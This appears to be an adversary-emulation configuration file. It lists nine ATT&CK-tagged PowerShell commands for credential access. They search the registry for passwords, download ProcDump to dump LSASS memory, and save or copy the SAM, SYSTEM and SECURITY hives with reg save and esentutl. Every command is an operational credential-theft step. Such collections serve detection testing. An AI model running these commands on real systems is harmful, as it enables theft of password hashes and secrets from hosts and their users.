commands:
  # Collection      - Total Commands : 9
  # Last Modified   - May 8
 
 # T1552.002
  - technique: "T1552.002 - Unsecured Credentials - Credentials in Registry"
    command: "reg query HKLM /f password /t REG_SZ /s"
    executor: "powershell"
    file_name: "HKLM_Passwords"

  - technique: "T1552.002 - Unsecured Credentials - Credentials in Registry"
    command: "reg query HKCU /f password /t REG_SZ /s"
    executor: "powershell"
    file_name: "HKCU_Passwords"

  - technique: "T1552.002 - Unsecured Credentials:Credentials in Registry-Checks for password filters in the registry"
    command: "reg query 'hklm\\system\\currentcontrolset\\control\\lsa' /v 'notification packages' "
    executor: "powershell"
    file_name: "PasswordFilters"
# ------------------------------------------------------------------------------------------------------------------------

  - technique: "T1003.001 - OS Credential Dumping:LSASS Memory Using ProcDump "
    command: |
      iwr -Uri 'https://live.sysinternals.com/procdump.exe' -OutFile 'C:\\system34\\Credential_Access_Output\\procdump.exe' -ErrorAction Stop;
      Start-Process 'C:\\system34\\Credential_Access_Output\\procdump.exe' -ArgumentList '-accepteula', '-ma', 'lsass.exe', 'C:\\system34\\Credential_Access_Output\\lsass.dmp'
    executor: "powershell"
    file_name: "Procdump_lsass$"

# ------------------------------------------------------------------------------------------------------------------------ 

  - technique: "T1003.002 - OS Credential Dumping:Security Account Manager Dumps hashes from SAM via Registry"
    command: "reg save HKLM\\SAM 'C:\\system34\\Credential_Access_Output\\SAM' /y"
    executor: "powershell"
    file_name: "SAM_Reg_Save_output$"

  - technique: "T1003.002 - OS Credential Dumping:Security Account Manager Dumps hashes from SYSTEM via Registry"
    command: "reg save HKLM\\SYSTEM 'C:\\system34\\Credential_Access_Output\\SYSTEM' /y"
    executor: "powershell"
    file_name: "SYSTEM_Reg_Save_output$"

  - technique: "T1003.002 - OS Credential Dumping:LSA Secrets "
    command: "reg save HKLM\\SECURITY 'C:\\system34\\Credential_Access_Output\\SECURITY' /y"
    executor: "powershell"
    file_name: "SECURITY_Reg_Save_output$"

  - technique: "T1003.002 - OS Credential Dumping:Security Account Manager - Dumps SAM  databases using esentutl.exe  "
    command: "esentutl.exe /y /vss C:\\Windows\\System32\\config\\SAM /d C:\\system34\\Credential_Access_Output\\SAM"
    executor: "powershell"
    file_name: "SAM_essenutil_output$"

  - technique: "T1003.002 - OS Credential Dumping:Security Account Manager - Dumps SECURITY databases using esentutl.exe "
    command: "esentutl.exe /y /vss C:\\Windows\\System32\\config\\SECURITY /d C:\\system34\\Credential_Access_Output\\SECURITY"
    executor: "powershell"
    file_name: "SECURITY_essenutil_output$"

# --------------------------------------------------------------------------------------------------------------------------
 
paths:
  baseFolder: "C:\\system34"
  outputFolder: "C:\\system34\\Credential_Access_Output"
  SummaryFolder: "C:\\system34\\Summary"